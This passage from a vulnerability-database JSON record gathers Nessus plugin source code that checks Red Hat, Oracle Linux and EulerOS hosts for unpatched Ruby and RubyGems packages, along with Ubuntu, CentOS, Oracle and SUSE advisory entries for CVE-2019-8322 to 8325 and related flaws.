(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:1235\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ruby-2.0.0.648-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ruby-2.0.0.648-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ruby-debuginfo-2.0.0.648-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ruby-devel-2.0.0.648-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ruby-devel-2.0.0.648-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ruby-doc-2.0.0.648-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ruby-irb-2.0.0.648-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ruby-libs-2.0.0.648-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ruby-tcltk-2.0.0.648-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ruby-tcltk-2.0.0.648-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"rubygem-bigdecimal-1.2.0-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"rubygem-bigdecimal-1.2.0-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"rubygem-io-console-0.4.2-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"rubygem-io-console-0.4.2-35.el7_6\")) flag++;\n\n if (rpm_exists(rpm:\"rubygem-json-1.7\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"rubygem-json-1.7.7-35.el7_6\")) flag++;\n\n if (rpm_exists(rpm:\"rubygem-json-1.7\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"rubygem-json-1.7.7-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygem-minitest-4.3.2-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"rubygem-psych-2.0.0-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"rubygem-psych-2.0.0-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygem-rake-0.9.6-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygem-rdoc-4.0.0-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygems-2.0.14.1-35.el7_6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"rubygems-devel-2.0.14.1-35.el7_6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby / ruby-debuginfo / ruby-devel / ruby-doc / ruby-irb / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:45:53", "description": "From Red Hat Security Advisory 2019:1235 :\n\nAn update for ruby is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nSecurity Fix(es) :\n\n* rubygems: Installing a malicious gem may lead to arbitrary code\nexecution (CVE-2019-8324)\n\n* rubygems: Escape sequence injection vulnerability in gem owner\n(CVE-2019-8322)\n\n* rubygems: Escape sequence injection vulnerability in API response\nhandling (CVE-2019-8323)\n\n* rubygems: Escape sequence injection vulnerability in errors\n(CVE-2019-8325)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 17, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-16T00:00:00", "title": "Oracle Linux 7 : ruby (ELSA-2019-1235)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8325", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:ruby-doc", "p-cpe:/a:oracle:linux:rubygem-psych", "p-cpe:/a:oracle:linux:rubygem-rdoc", "p-cpe:/a:oracle:linux:ruby-irb", "p-cpe:/a:oracle:linux:rubygem-json", "p-cpe:/a:oracle:linux:rubygem-io-console", "p-cpe:/a:oracle:linux:ruby-devel", "p-cpe:/a:oracle:linux:rubygem-bigdecimal", "p-cpe:/a:oracle:linux:rubygem-rake", "p-cpe:/a:oracle:linux:ruby", "p-cpe:/a:oracle:linux:rubygem-minitest", "p-cpe:/a:oracle:linux:rubygems", "p-cpe:/a:oracle:linux:rubygems-devel", "p-cpe:/a:oracle:linux:ruby-tcltk", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:ruby-libs"], "id": "ORACLELINUX_ELSA-2019-1235.NASL", "href": "https://www.tenable.com/plugins/nessus/125191", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:1235 and \n# Oracle Linux Security Advisory ELSA-2019-1235 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125191);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/17\");\n\n script_cve_id(\"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_xref(name:\"RHSA\", value:\"2019:1235\");\n\n script_name(english:\"Oracle Linux 7 : ruby (ELSA-2019-1235)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2019:1235 :\n\nAn update for ruby is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRuby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to perform system\nmanagement tasks.\n\nSecurity Fix(es) :\n\n* rubygems: Installing a malicious gem may lead to arbitrary code\nexecution (CVE-2019-8324)\n\n* rubygems: Escape sequence injection vulnerability in gem owner\n(CVE-2019-8322)\n\n* rubygems: Escape sequence injection vulnerability in API response\nhandling (CVE-2019-8323)\n\n* rubygems: Escape sequence injection vulnerability in errors\n(CVE-2019-8325)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2019-May/008738.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-minitest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-rake\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygem-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:rubygems-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-2.0.0.648-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-devel-2.0.0.648-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-doc-2.0.0.648-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-irb-2.0.0.648-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-libs-2.0.0.648-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ruby-tcltk-2.0.0.648-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-bigdecimal-1.2.0-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-io-console-0.4.2-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-json-1.7.7-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-minitest-4.3.2-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-psych-2.0.0-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-rake-0.9.6-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygem-rdoc-4.0.0-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygems-2.0.14.1-35.el7_6\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"rubygems-devel-2.0.14.1-35.el7_6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby / ruby-devel / ruby-doc / ruby-irb / ruby-libs / ruby-tcltk / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T08:58:14", "description": "According to the versions of the ruby packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - rubygems: Installing a malicious gem may lead to\n arbitrary code execution (CVE-2019-8324)\n\n - rubygems: Escape sequence injection vulnerability in\n gem owner (CVE-2019-8322)\n\n - rubygems: Escape sequence injection vulnerability in\n API response handling (CVE-2019-8323)\n\n - rubygems: Escape sequence injection vulnerability in\n errors (CVE-2019-8325)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-29T00:00:00", "title": "EulerOS 2.0 SP5 : ruby (EulerOS-SA-2019-1597)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8325", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "modified": "2019-05-29T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ruby-libs", "p-cpe:/a:huawei:euleros:ruby-irb", "p-cpe:/a:huawei:euleros:ruby", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-1597.NASL", "href": "https://www.tenable.com/plugins/nessus/125524", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125524);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2019-8322\",\n \"CVE-2019-8323\",\n \"CVE-2019-8324\",\n \"CVE-2019-8325\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : ruby (EulerOS-SA-2019-1597)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ruby packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - rubygems: Installing a malicious gem may lead to\n arbitrary code execution (CVE-2019-8324)\n\n - rubygems: Escape sequence injection vulnerability in\n gem owner (CVE-2019-8322)\n\n - rubygems: Escape sequence injection vulnerability in\n API response handling (CVE-2019-8323)\n\n - rubygems: Escape sequence injection vulnerability in\n errors (CVE-2019-8325)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1597\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e9b827e3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ruby-2.0.0.648-33.h13.eulerosv2r7\",\n \"ruby-irb-2.0.0.648-33.h13.eulerosv2r7\",\n \"ruby-libs-2.0.0.648-33.h13.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:40:17", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "It was discovered that Ruby incorrectly handled certain RubyGems. \nAn attacker could possibly use this issue to execute arbitrary commands. \n(CVE-2019-8320)\n\nIt was discovered that Ruby incorrectly handled certain inputs. \nAn attacker could possibly use this issue to execute arbitrary code. \n(CVE-2019-8321, CVE-2019-8322, CVE-2019-8323, CVE-2019-8324, CVE-2019-8325)", "edition": 3, "modified": "2019-04-11T00:00:00", "published": "2019-04-11T00:00:00", "id": "USN-3945-1", "href": "https://ubuntu.com/security/notices/USN-3945-1", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:40:39", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "**CentOS Errata and Security Advisory** CESA-2019:1235\n\n\nRuby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nSecurity Fix(es):\n\n* rubygems: Installing a malicious gem may lead to arbitrary code execution (CVE-2019-8324)\n\n* rubygems: Escape sequence injection vulnerability in gem owner (CVE-2019-8322)\n\n* rubygems: Escape sequence injection vulnerability in API response handling (CVE-2019-8323)\n\n* rubygems: Escape sequence injection vulnerability in errors (CVE-2019-8325)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2019-May/035353.html\n\n**Affected packages:**\nruby\nruby-devel\nruby-doc\nruby-irb\nruby-libs\nruby-tcltk\nrubygem-bigdecimal\nrubygem-io-console\nrubygem-json\nrubygem-minitest\nrubygem-psych\nrubygem-rake\nrubygem-rdoc\nrubygems\nrubygems-devel\n\n**Upstream details at:**\n", "edition": 5, "modified": "2019-05-21T21:25:00", "published": "2019-05-21T21:25:00", "id": "CESA-2019:1235", "href": "http://lists.centos.org/pipermail/centos-announce/2019-May/035353.html", "title": "ruby, rubygem, rubygems security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-06-19T22:45:46", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "[2.0.0.648-35]\n- Introduce method as precondition to fix\n CVE-2019-8321.\n * rubygems-2.3.0-refactor-checking-really_verbose.patch\n- Fix escape sequence injection vulnerability in verbose.\n- Fix escape sequence injection vulnerability in gem owner.\n- Fix escape sequence injection vulnerability in API response handling.\n- Prohibit arbitrary code execution when installing a malicious gem.\n- Fix escape sequence injection vulnerability in errors.\n * ruby-2.4.6-Applied-security-patches-for-RubyGems.patch\n Resolves: rhbz#1699283\n[2.0.0.648-35]\n- Refresh expired certificates.", "edition": 3, "modified": "2019-05-16T00:00:00", "published": "2019-05-16T00:00:00", "id": "ELSA-2019-1235", "href": "http://linux.oracle.com/errata/ELSA-2019-1235.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-30T19:21:35", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8324"], "description": "ruby\n[2.5.3-104]\n- Prohibit arbitrary code execution when installing a malicious gem.\n Resolves: CVE-2019-8324\nrubygem-mongo\n[2.5.1-2]\n- Disable tests to fix FTBFS by dropped MongoDB module.\n Resolves: rhbz#1710863\nrubygem-pg\n[1.0.0-2]\n- Assign a random testing port.", "edition": 2, "modified": "2019-08-05T00:00:00", "published": "2019-08-05T00:00:00", "id": "ELSA-2019-1972", "href": "http://linux.oracle.com/errata/ELSA-2019-1972.html", "title": "ruby:2.5 security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-14T08:36:20", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8778", "CVE-2017-17742", "CVE-2018-1000073", "CVE-2018-8780", "CVE-2018-1000078", "CVE-2018-1000075", "CVE-2019-8325", "CVE-2018-1000076", "CVE-2018-16396", "CVE-2018-1000074", "CVE-2019-8321", "CVE-2018-8777", "CVE-2019-8323", "CVE-2018-8779", "CVE-2018-1000077", "CVE-2018-1000079", "CVE-2018-6914", "CVE-2019-8322", "CVE-2019-8324"], "description": "[2.0.0.648-36]\n- Introduce 'Gem::UserInteraction#verbose' method as precondition to fix\n CVE-2019-8321.\n * rubygems-2.3.0-refactor-checking-really_verbose.patch\n- Fix escape sequence injection vulnerability in verbose.\n- Fix escape sequence injection vulnerability in gem owner.\n Resolves: CVE-2019-8322\n- Fix escape sequence injection vulnerability in API response handling.\n Resolves: CVE-2019-8323\n- Prohibit arbitrary code execution when installing a malicious gem.\n Resolves: CVE-2019-8324\n- Fix escape sequence injection vulnerability in errors.\n Resolves: CVE-2019-8325\n * ruby-2.4.6-Applied-security-patches-for-RubyGems.patch", "edition": 1, "modified": "2019-08-13T00:00:00", "published": "2019-08-13T00:00:00", "id": "ELSA-2019-2028", "href": "http://linux.oracle.com/errata/ELSA-2019-2028.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2019-07-21T13:42:45", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8778", "CVE-2017-17742", "CVE-2018-1000073", "CVE-2018-8780", "CVE-2018-1000078", "CVE-2018-16395", "CVE-2018-1000075", "CVE-2019-8320", "CVE-2019-8325", "CVE-2018-1000076", "CVE-2018-16396", "CVE-2018-1000074", "CVE-2019-8321", "CVE-2018-8777", "CVE-2019-8323", "CVE-2018-8779", "CVE-2018-1000077", "CVE-2018-1000079", "CVE-2018-6914", "CVE-2019-8322", "CVE-2019-8324"], "description": "This update for ruby2.5 and ruby-bundled-gems-rpmhelper fixes the\n following issues:\n\n Changes in ruby2.5:\n\n Update to 2.5.5 and 2.5.4:\n\n <a rel=\"nofollow\" href=\"https://www.ruby-lang.org/en/news/2019/03/15/ruby-2-5-5-released/\">https://www.ruby-lang.org/en/news/2019/03/15/ruby-2-5-5-released/</a>\n <a rel=\"nofollow\" href=\"https://www.ruby-lang.org/en/news/2019/03/13/ruby-2-5-4-released/\">https://www.ruby-lang.org/en/news/2019/03/13/ruby-2-5-4-released/</a>\n\n Security issues fixed:\n\n - CVE-2019-8320: Delete directory using 